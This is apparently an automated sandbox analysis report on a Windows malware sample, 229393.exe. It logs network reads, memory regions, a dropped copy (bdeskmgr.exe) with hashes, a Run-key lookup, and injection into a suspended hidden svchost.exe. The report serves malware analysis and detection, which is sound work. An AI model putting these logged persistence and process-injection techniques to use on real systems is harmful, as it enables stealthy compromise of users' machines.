| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 8712 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 26136 |
|
1 | |
| Read Response | size = 65536, size_out = 4356 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 27588 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 24684 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 30492 |
|
1 | |
| Read Response | size = 65536, size_out = 7260 |
|
1 | |
| Read Response | size = 65536, size_out = 11616 |
|
1 | |
| Read Response | size = 65536, size_out = 33396 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 15972 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 31944 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 14520 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 49368 |
|
1 | |
| Read Response | size = 65536, size_out = 4356 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Read Response | size = 65536, size_out = 884 |
|
1 | |
| Read Response | size = 65536, size_out = 26136 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 5612 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 14324 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 4356 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 27588 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 7064 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 12872 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 4356 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 7260 |
|
1 | |
| Read Response | size = 65536, size_out = 8712 |
|
1 | |
| Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Read Response | size = 65536, size_out = 884 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 7260 |
|
1 | |
| Read Response | size = 65536, size_out = 65340 |
|
1 | |
| Read Response | size = 65536, size_out = 7260 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Read Response | size = 65536, size_out = 18308 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 33200 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 7064 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 7260 |
|
1 | |
| Read Response | size = 65536, size_out = 13068 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 7064 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 7064 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 4356 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 13068 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
2 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 4160 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 38519, size_out = 1256 |
|
1 | |
| Read Response | size = 37263, size_out = 33396 |
|
1 | |
| Read Response | size = 3867, size_out = 3867 |
|
1 | |
| Close Session | - |
|
1 |
Process #4: 229393.exe
314
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\public\229393.exe |
| Command Line | "C:\Users\Public\229393.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8f8 |
| Parent PID | 0xb60 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
3A4
0x
648
0x
950
0x
958
0x
95C
0x
954
0x
94C
0x
948
0x
944
0x
7C0
0x
940
0x
938
0x
92C
0x
928
0x
614
0x
7E8
0x
8DC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| oleaccrc.dll | 0x001b0000 | 0x001b0fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00390000 | 0x003f6fff | Memory Mapped File | Readable |
|
|
|
- |
| 229393.exe | 0x00400000 | 0x006cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000006d0000 | 0x006d0000 | 0x0070ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x0070dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x0073ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x008c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x00a50fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x01e5ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01e9dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ec0000 | 0x01ec0000 | 0x01ecffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001ed0000 | 0x01ed0000 | 0x01faefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x01feffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x01fedfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ff0000 | 0x01ff0000 | 0x01ffffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002000000 | 0x02000000 | 0x0207ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x020bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x020bdfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020c0000 | 0x020c0000 | 0x020fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020c0000 | 0x020c0000 | 0x020fdfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002120000 | 0x02120000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x02256fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x022effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x0225ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x0219ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x0219dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x0229ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x021dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x021ddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021e0000 | 0x021e0000 | 0x0221dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0225ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0225dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x0229ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x0229dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x022dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x022ddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022e0000 | 0x022e0000 | 0x022effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022f0000 | 0x022f0000 | 0x023effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022f0000 | 0x022f0000 | 0x0232ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022f0000 | 0x022f0000 | 0x0232dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002330000 | 0x02330000 | 0x0236dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x023affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x023adfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x024affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x023e9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x024effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x0242ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x0252ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x025d8fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002430000 | 0x02430000 | 0x024b8fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x024effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x025effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002530000 | 0x02530000 | 0x0262ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025f0000 | 0x025f0000 | 0x02b6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025f0000 | 0x025f0000 | 0x026effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x02b6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002b70000 | 0x02b70000 | 0x02e2afff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02e30000 | 0x030fefff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003100000 | 0x03100000 | 0x032a8fff | Private Memory | Readable, Writable |
|
|
|
- |
| oleacc.dll | 0x73f60000 | 0x73f9bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msimg32.dll | 0x741f0000 | 0x741f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winmm.dll | 0x74200000 | 0x74231fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdiplus.dll | 0x74240000 | 0x743cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x743d0000 | 0x743dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x743e0000 | 0x74463fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winspool.drv | 0x74470000 | 0x744c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74910000 | 0x7498ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x749a0000 | 0x749a7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x749b0000 | 0x74a0bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74a10000 | 0x74a4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comdlg32.dll | 0x75210000 | 0x7528afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\roaming\microsoft\crypore6\bdeskmgr.exe | 2.73 MB |
MD5:
a6f489d45984338621f3c377d82220ce
SHA1: bbe3a54281addb8a59832ecc093f986381f2a622 SHA256: 3d97696c003caf79376088c61bf21d782248fab1f6e8baac0a918013adc654b2 |
|
|
Host Behavior
File (21)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Public\229393.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\c_1252.nls | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
3 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\aETAdzjz\AppData\Roaming\Microsoft | - |
|
1 | |
| Create Directory | C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6 | - |
|
1 | |
| Get Info | C:\Users\Public\229393.exe | type = size |
|
1 | |
| Get Info | C:\Windows\system32\c_1252.nls | type = time |
|
1 | |
| Get Info | C:\Windows\system32\c_1252.nls | type = time |
|
1 | |
| Get Info | C:\Windows\system32\c_1252.nls | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Move | - | source_filename = C:\Users\Public\229393.exe, flags = MOVEFILE_DELAY_UNTIL_REBOOT |
|
1 | |
| Write | - | size = 1 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe | size = 4096 |
|
2 | |
| Write | C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe | size = 2856960 |
|
1 | |
| Delete | C:\Users\Public\229393.exe | - |
|
1 |
Registry (15)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Open Key | HKEY_USERS | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = api--1-0, data = 144, type = REG_NONE |
|
1 | |
| Read Value | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders | value_name = AppData, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders | value_name = AppData, data = C:\Users\aETAdzjz\AppData\Roaming, type = REG_SZ |
|
1 | |
| Read Value | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | value_name = Client, data = 0, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_USERS | - |
|
1 | |
| Enumerate Keys | HKEY_USERS | - |
|
1 | |
| Enumerate Keys | HKEY_USERS | - |
|
1 | |
| Enumerate Keys | HKEY_USERS | - |
|
1 | |
| Enumerate Keys | HKEY_USERS | - |
|
1 | |
| Enumerate Keys | HKEY_USERS | - |
|
1 | |
| Enumerate Keys | HKEY_USERS | - |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\svchost.exe | os_pid = 0x76c, creation_flags = CREATE_SUSPENDED, CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Thread (6)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Suspend | c:\users\public\229393.exe | os_tid = 0x7e8 |
|
1 | |
| Get Context | c:\users\public\229393.exe | os_tid = 0x7e8 |
|
2 | |
| Set Context | c:\users\public\229393.exe | os_tid = 0x7e8 |
|
1 | |
| Resume | c:\users\public\229393.exe | os_tid = 0x7e8 |
|
2 |
Memory (5)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | C:\Windows\system32\svchost.exe | address = 0x26ef0e0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 40825052 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0xffba246c, protection = PAGE_EXECUTE_READWRITE, size = 40826392 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0xffba2000, protection = PAGE_EXECUTE_READ, size = 40826392 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x20000, size = 792 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0xffba246c, size = 4 |
|
1 |
Module (204)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32 | base_address = 0x74cb0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Load | ntdll.dll | base_address = 0x770d0000 |
|
2 | |
| Load | SHLWAPI.dll | base_address = 0x75170000 |
|
1 | |
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x758a0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x768c0000 |
|
1 | |
| Load | USER32.DLL | base_address = 0x75570000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74cb0000 |
|
3 | |
| Get Handle | c:\users\public\229393.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x770d0000 |
|
1 | |
| Get Filename | - | process_name = c:\users\public\229393.exe, file_name_orig = C:\Users\Public\229393.exe, size = 260 |
|
1 | |
| Get Filename | c:\users\public\229393.exe | process_name = c:\users\public\229393.exe, file_name_orig = C:\Users\Public\229393.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | address_out = 0x74cc4f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74cc359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74cc1252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74cc4208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74cc4d28 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74d4410b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74d44195 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74ccd31f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74cdee7e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7711441c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7713c50e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | address_out = 0x7713c381 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74cdf088 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x771205d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7713ca24 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x770f0b8c |
